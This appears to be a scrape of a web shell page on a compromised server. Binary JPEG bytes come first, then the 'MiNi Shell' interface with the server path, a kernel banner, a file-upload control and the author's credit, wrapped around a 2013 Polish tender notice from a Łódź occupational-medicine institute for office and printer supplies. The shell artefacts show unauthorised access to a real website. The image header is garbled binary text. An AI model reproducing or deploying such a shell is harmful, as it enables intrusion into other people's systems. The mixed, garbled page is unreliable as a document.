JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131004/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131004/403886-N-2013.html

<p class="kh_header"><b>Łódź: Dostawa materiałów biurowych oraz materiałów eksploatacyjnych i nośników danych</b><br>
<b>Numer ogłoszenia: 403886 - 2013; data zamieszczenia: 04.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Medycyny Pracy im. prof. dra med. Jerzego Nofera , ul. Św. Teresy od Dzieciątka Jezus 8, 91-348 Łódź, woj. łódzkie, tel. 42 6314533, faks 42 6314573.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.imp.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytut badawczy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów biurowych oraz materiałów eksploatacyjnych i nośników danych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
Dostawa materiałów biurowych oraz materiałów eksploatacyjnych i nośników danych do siedziby Zamawiającego tj. Instytutu Medycyny Pracy w Łodzi ul. Św. Teresy od Dzieciątka Jezus nr 8, 91-348 Łódź, 
Zakup współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Rozwoju Regionalnego UDA POIG.02.01.00-00-017/10-03. Innowacyjna Gospodarka  Narodowa Strategia Spójności. 

Całość zamówienia podzielona jest na dwie części:
Część 1 - Materiały biurowe
Część 2 -  Materiały eksploatacyjne i nośniki danych

Opis części 1 - Materiały biurowe.

Szczegółowy wykaz zamawianych towarów przedstawiony jest w Załączniku nr 1a do SIWZ.

Wykonawca może zaproponować towar równoważny tzn. taki, który posiada parametry co najmniej takie jak określone w SIWZ.

W przypadku, gdy Zamawiający w wymaganiach technicznych wskazał konkretny typ towaru (producent/marka, symbol indywidualizujący towar) Wykonawca może zaoferować towar równoważny, przez co rozumie się, że będzie to towar nie gorszy niż wskazany pod względem parametrów ilościowych (np.: wielkość opakowania), jakościowych - precyzji wykonania, trwałości, walorów użytkowych i estetycznych, rozwiązań technicznych. Zamawiający odrzuci ofertę, jeśli którykolwiek z oferowanych towarów, jako równoważny do wskazanego, nie będzie spełniał kryteriów równoważności opisanych wyżej.

Oferowane towary muszą być opakowane w sposób umożliwiający ich identyfikację (ilość, dane indywidualizujące - marka (symbol) bez konieczności naruszania opakowania.

Termin ważności towarów (przydatności do użycia) musi wynosić minimum 12 miesięcy od daty dostawy.



Przedmiot umowy będzie dostarczany przez Wykonawcę jego transportem, na jego koszt do magazynu IMP. Wykonawca ponosi pełną odpowiedzialność za dostawę do czasu przekazania jej Zamawiającemu.
W przypadku stwierdzenia wad fizycznych w dostarczonym towarze, Wykonawca zobowiązuje się do wymiany wadliwego przedmiotu zamówienia na towar wolny od wad w ciągu 2 dni roboczych od momentu zgłoszenia wadliwości bez żadnej dopłaty. W przypadku stwierdzenia braków ilościowych w dostarczonym towarze Wykonawca ma obowiązek dokonać zgodnych z zamówieniem korekt w dostawie w ciągu 2 dni roboczych od momentu otrzymania od Zamawiającego informacji o stwierdzeniu braków ilościowych.

Opis części 2 - Materiały eksploatacyjne i nośniki danych

Szczegółowy wykaz zamawianych towarów zawierający typ sprzętu jakim dysponuje zamawiający i rodzaj materiału eksploatacyjnego zalecanego przez producenta sprzętu oraz ilości zostały zawarte w Załączniku nr 1b do SIWZ.
Zamawiający informuje, że dopuszcza składanie ofert na materiały eksploatacyjne jakościowo równoważne, spełniające równoważne parametry; 
Wykonawca gwarantuje, że oferowane tonery, atramenty, wkłady, głowice, taśmy barwiące i nośniki danych będą wysokiej jakości oraz zapewniają kompatybilność pracy z urządzeniami zamawiającego, a   zamontowanie i używanie dostarczonych przez Wykonawcę wkładów drukujących nie spowoduje utraty praw gwarancji producenta urządzenia do którego są przeznaczone; 
Wykonawca gwarantuje, że oferowane materiały eksploatacyjne zapewniają należyte bezpieczeństwo oraz posiadają właściwe opakowanie i oznakowanie;
Materiały eksploatacyjne muszą być fabrycznie nowe, oryginalnie fabrycznie zamknięte, niepowodujące utraty gwarancji na sprzęt komputerowy, nieregenerowane, nieprefabrykowane, nienapełniane ponownie, o jakości i parametrach wymaganych przez producentów sprzętu komputerowego, a kasety z tonerem muszą być  fabrycznie opakowane w sposób chroniący kasetę z tonerem po wyjęciu z opakowania zewnętrznego (opakowania wewnętrzne). Każda  kaseta oraz opakowanie  z  tonerem  muszą  ponadto  posiadać zabezpieczenie gwarantujące rozpoznanie, że materiał eksploatacyjny nie był używany;
Termin przydatności do użycia dostarczonych materiałów eksploatacyjnych musi być nie krótszy niż 24 miesiące licząc od dnia podpisania protokołu odbioru. Wykonawca musi zagwarantować poprawną jakość drukowania do pełnego wyczerpania środka barwiącego w okresie przydatności do użycia;
Wszystkie dostarczone materiały eksploatacyjne muszą posiadać na opakowaniach zewnętrznych logo producenta, nazwę (typ, symbol) materiału, kod producenta umożliwiający jednoznaczną identyfikację producenta oraz typ materiału eksploatacyjnego, termin przydatności do użycia. Oznaczenia muszą być umieszczone trwale na opakowaniu zewnętrznym, a w przypadku tonerów także bezpośrednio na kasecie z tonerem;
Wykonawca dostarczy zamówione materiały eksploatacyjne swoim transportem. 

Pod pojęciem (fabrycznie nowe) zamawiający rozumie produkty wykonane z nowych elementów bez śladów uszkodzenia, w oryginalnych opakowaniach producenta z widocznym logo, symbolem produktu i terminem przydatności do użytku. 
Przez produkt równoważny zamawiający rozumie produkt kompatybilny ze sprzętem, do którego jest zamówiony, o parametrach takich samych bądź lepszych (pojemność tuszu/tonera, wydajność i jakość wydruku, stopnia oddania barw) w stosunku do oryginału produkowanego przez producenta urządzenia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 32.58.20.00-6, 30.12.51.10-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu nie jest wymagane.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. 
Wykonawca potwierdza spełnianie tego warunku poprzez złożenie oświadczenia z art. 22. ust.  
1 - Załącznik Nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. 
Wykonawca potwierdza spełnianie tego warunku poprzez złożenie oświadczenia z art. 22. ust. 
1 - Załącznik Nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. 
Wykonawca potwierdza spełnianie tego warunku poprzez złożenie oświadczenia z art. 22. ust. 
1 - Załącznik Nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. 
Wykonawca potwierdza spełnianie tego warunku poprzez złożenie oświadczenia z art. 22. ust. 
1 - Załącznik Nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. 
Wykonawca potwierdza spełnianie tego warunku poprzez złożenie oświadczenia z art. 22. ust. 
1 - Załącznik Nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>wypełnione załączniki do SIWZ, stosownie do części na którą zostaje złożona oferta.
Dokument określający zasady reprezentacji oraz osoby uprawnione do reprezentacji Wykonawcy, a jeżeli Wykonawcę reprezentuje pełnomocnik - także pełnomocnictwo, określające zakres umocowania podpisane przez osoby uprawnione do reprezentowania Wykonawcy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.imp.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Medycyny Pracy w Łodzi, ul. Św. Teresy od Dzieciątka Jezus Nr 8 w pokoju 384.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.10.2013 godzina 11:00, miejsce: Instytut Medycyny Pracy w Łodzi, ul. Św. Teresy od Dzieciątka Jezus Nr 8 w pokoju 81 - Kancelaria Główna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zakup współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Rozwoju Regionalnego UDA_POIG.02.01.00-00-017/10-03. Innowacyjna Gospodarka  Narodowa Strategia Spójności..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Materiały biurowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy wykaz zamawianych towarów przedstawiony jest w Załączniku nr 1a do SIWZ.

Wykonawca może zaproponować towar równoważny tzn. taki, który posiada parametry co najmniej takie jak określone w SIWZ.

W przypadku, gdy Zamawiający w wymaganiach technicznych wskazał konkretny typ towaru (producent/marka, symbol indywidualizujący towar) Wykonawca może zaoferować towar równoważny, przez co rozumie się, że będzie to towar nie gorszy niż wskazany pod względem parametrów ilościowych (np.: wielkość opakowania), jakościowych - precyzji wykonania, trwałości, walorów użytkowych i estetycznych, rozwiązań technicznych. Zamawiający odrzuci ofertę, jeśli którykolwiek z oferowanych towarów, jako równoważny do wskazanego, nie będzie spełniał kryteriów równoważności opisanych wyżej.

Oferowane towary muszą być opakowane w sposób umożliwiający ich identyfikację (ilość, dane indywidualizujące - marka / symbol) bez konieczności naruszania opakowania.

Termin ważności towarów (przydatności do użycia) musi wynosić minimum 12 miesięcy od daty dostawy.



Przedmiot umowy będzie dostarczany przez Wykonawcę jego transportem, na jego koszt do magazynu IMP. Wykonawca ponosi pełną odpowiedzialność za dostawę do czasu przekazania jej Zamawiającemu.
W przypadku stwierdzenia wad fizycznych w dostarczonym towarze, Wykonawca zobowiązuje się do wymiany wadliwego przedmiotu zamówienia na towar wolny od wad w ciągu 2 dni roboczych od momentu zgłoszenia wadliwości bez żadnej dopłaty. W przypadku stwierdzenia braków ilościowych w dostarczonym towarze Wykonawca ma obowiązek dokonać zgodnych z zamówieniem korekt w dostawie w ciągu 2 dni roboczych od momentu otrzymania od Zamawiającego informacji o stwierdzeniu braków ilościowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Materiały eksploatacyjne i nośniki danych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy wykaz zamawianych towarów zawierający typ sprzętu jakim dysponuje zamawiający i rodzaj materiału eksploatacyjnego zalecanego przez producenta sprzętu oraz ilości zostały zawarte w Załączniku nr 1b do SIWZ.
Zamawiający informuje, że dopuszcza składanie ofert na materiały eksploatacyjne jakościowo równoważne, spełniające równoważne parametry; 
Wykonawca gwarantuje, że oferowane tonery, atramenty, wkłady, głowice, taśmy barwiące i nośniki danych będą wysokiej jakości oraz zapewniają kompatybilność pracy z urządzeniami zamawiającego, a   zamontowanie i używanie dostarczonych przez Wykonawcę wkładów drukujących nie spowoduje utraty praw gwarancji producenta urządzenia do którego są przeznaczone; 
Wykonawca gwarantuje, że oferowane materiały eksploatacyjne zapewniają należyte bezpieczeństwo oraz posiadają właściwe opakowanie i oznakowanie;
Materiały eksploatacyjne muszą być fabrycznie nowe, oryginalnie fabrycznie zamknięte, niepowodujące utraty gwarancji na sprzęt komputerowy, nieregenerowane, nieprefabrykowane, nienapełniane ponownie, o jakości i parametrach wymaganych przez producentów sprzętu komputerowego, a kasety z tonerem muszą być  fabrycznie opakowane w sposób chroniący kasetę z tonerem po wyjęciu z opakowania zewnętrznego (opakowania wewnętrzne). Każda  kaseta oraz opakowanie  z  tonerem  muszą  ponadto  posiadać zabezpieczenie gwarantujące rozpoznanie, że materiał eksploatacyjny nie był używany;
Termin przydatności do użycia dostarczonych materiałów eksploatacyjnych musi być nie krótszy niż 24 miesiące licząc od dnia podpisania protokołu odbioru. Wykonawca musi zagwarantować poprawną jakość drukowania do pełnego wyczerpania środka barwiącego w okresie przydatności do użycia;
Wszystkie dostarczone materiały eksploatacyjne muszą posiadać na opakowaniach zewnętrznych logo producenta, nazwę (typ, symbol) materiału, kod producenta umożliwiający jednoznaczną identyfikację producenta oraz typ materiału eksploatacyjnego, termin przydatności do użycia. Oznaczenia muszą być umieszczone trwale na opakowaniu zewnętrznym, a w przypadku tonerów także bezpośrednio na kasecie z tonerem;
Wykonawca dostarczy zamówione materiały eksploatacyjne swoim transportem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 32.58.20.00-6, 30.12.51.10-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com